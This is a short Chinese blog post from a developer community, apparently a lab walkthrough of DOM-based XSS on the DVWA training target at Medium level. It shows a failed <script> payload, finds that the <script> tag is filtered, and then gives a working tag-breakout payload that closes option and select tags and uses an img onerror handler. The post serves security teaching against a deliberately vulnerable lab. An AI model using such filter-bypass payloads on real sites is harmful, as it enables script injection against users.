备案控制台
开发者社区 开发与运维 文章 正文

Medium 级别 DOM 型 XSS 演示(附链接)

2024-04-29 20
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Medium 级别 DOM 型 XSS 演示(附链接)

环境准备


测试

打开 DVWA 靶场并登录,找到 DOM 型 XSS 页面(笔者这里是 Medium 级别)

跟 Low 级别一样,直接上手

<script>alert(/xss/)</script>


失败

逐步分析,先输入敏感字符 script 试试


再输出符号试试

也没问题,试试输入单个 <script>

原因找到了,过滤了 <script>


既然 JS 代码不行,就换 HTML 标签,反正它也没过滤符号

先闭合掉前面的 option 标签

<option>

再闭合掉 select 标签

</option></select>

最后随便加个标签,里面加点 JS 代码

</option></select><img src=# οnerrοr=alert(/xss/)>


成功


标签完美闭合







文章标签:
JavaScript
关键词:
medium XSS链接
XSS链接
dom xss链接
dom xss
dom链接
香甜可口草莓蛋糕
目录
相关文章
香甜可口草莓蛋糕
|
1天前
|
存储 JavaScript
Medium 级别存储型 XSS 演示(附链接)
Medium 级别存储型 XSS 演示(附链接)
香甜可口草莓蛋糕
21 2
香甜可口草莓蛋糕
|
1天前
|
存储 JavaScript 前端开发
High 级别存储型 XSS 演示(附链接)
High 级别存储型 XSS 演示(附链接)
香甜可口草莓蛋糕
21 1
香甜可口草莓蛋糕
|
1天前
|
存储 前端开发 JavaScript
Low 级别存储型 XSS 演示(附链接)
Low 级别存储型 XSS 演示(附链接)
香甜可口草莓蛋糕
20 1
香甜可口草莓蛋糕
|
1天前
|
JavaScript
High 级别 DOM 型 XSS 演示(附链接)
High 级别 DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
22 3
香甜可口草莓蛋糕
|
1天前
|
JavaScript
Low 级别 DOM 型 XSS 演示(附链接)
Low 级别 DOM 型 XSS 演示(附链接)
香甜可口草莓蛋糕
15 0
桃李春风一杯酒
|
1天前
|
缓存 JavaScript 前端开发
【JavaScript 技术专栏】DOM 操作全攻略:从基础到进阶
【4月更文挑战第30天】本文深入讲解JavaScript与DOM交互,涵盖DOM基础、获取/修改元素、创建/删除元素、事件处理结合及性能优化。通过学习,开发者能掌握动态改变网页内容、结构和样式的技能,实现更丰富的交互体验。文中还讨论了DOM操作在实际案例、与其他前端技术结合的应用,助你提升前端开发能力。
桃李春风一杯酒
26 0
众所周知
|
1天前
|
JavaScript 前端开发
JavaScript 提供了多种方法来操作 DOM(文档对象模型)
【5月更文挑战第11天】JavaScript 用于DOM操作的方法包括获取元素(getElementById, getElementsByClassName等)、修改内容(innerHTML, innerText, textContent)、改变属性、添加/删除元素(appendChild, removeChild)和调整样式。此外,addEventListener用于监听事件。注意要考虑兼容性和性能当使用这些技术。
众所周知
7 2
晓同哇哇~
|
1天前
|
JavaScript 前端开发 安全
javascript操作DOM的方法
javascript操作DOM的方法
晓同哇哇~
12 0
景天科技苑
|
1天前
|
前端开发 JavaScript 数据安全/隐私保护
前端javascript的DOM对象操作技巧,全场景解析(二)
前端javascript的DOM对象操作技巧,全场景解析(二)
景天科技苑
16 0
景天科技苑
|
1天前
|
移动开发 缓存 JavaScript
前端javascript的DOM对象操作技巧,全场景解析(一)
前端javascript的DOM对象操作技巧,全场景解析(一)
景天科技苑
9 0

热门文章

最新文章

  • 1
    前端安全:Vue应用中防范XSS和CSRF攻击
  • 2
    vue3+echarts应用——深度遍历html的dom结构并用树图进行可视化
  • 3
    【专栏】前端开发中的slot算法和shadow DOM,两者提供更灵活、高效和模块化的开发方式
  • 4
    Teleport传送:使用Vue的Teleport进行跨DOM结构渲染
  • 5
    High 级别 DOM 型 XSS 演示(附链接)
  • 6
    webgl学习笔记3_javascript的HTML DOM
  • 7
    前端javascript的DOM对象操作技巧,全场景解析(二)
  • 8
    js_操作dom(委托和冒泡事件)
  • 9
    深入解析JavaScript原生操作DOM技术
  • 10
    Low 级别 DOM 型 XSS 演示(附链接)
  • 1
    High 级别 DOM 型 XSS 演示(附链接)
    22
  • 2
    Low 级别 DOM 型 XSS 演示(附链接)
    15
  • 3
    前端javascript的DOM对象操作技巧,全场景解析(二)
    16
  • 4
    前端javascript的DOM对象操作技巧,全场景解析(一)
    9
  • 5
    【Web 前端】JQ对象和DOM元素之间如何转换?
    7
  • 6
    JavaScript DOM 文档对象模型(获取、改变html元素)
    15
  • 7
    【专栏】前端开发中的slot算法和shadow DOM,两者提供更灵活、高效和模块化的开发方式
    30
  • 8
    vue3+echarts应用——深度遍历html的dom结构并用树图进行可视化
    40
  • 9
    easyv平台_过滤器强制修改dom(暴力自定义组件渲染样式)
    8
  • 10
    js_操作dom(委托和冒泡事件)
    16

    • 相关电子书

    更多
  • Flash Player最新安全特性分析 及绕过思路
  • Flash Player最新安全特性分析及绕过思路
  • JavaScript 语言在引擎级别的执行过程

    • 相关实验场景

    更多
  • 通过函数计算实现网站文件自动处理
    • 下一篇
    2024年阿里云免费云服务器及学生云服务器申请教程参考
    http://www.vxiaotou.com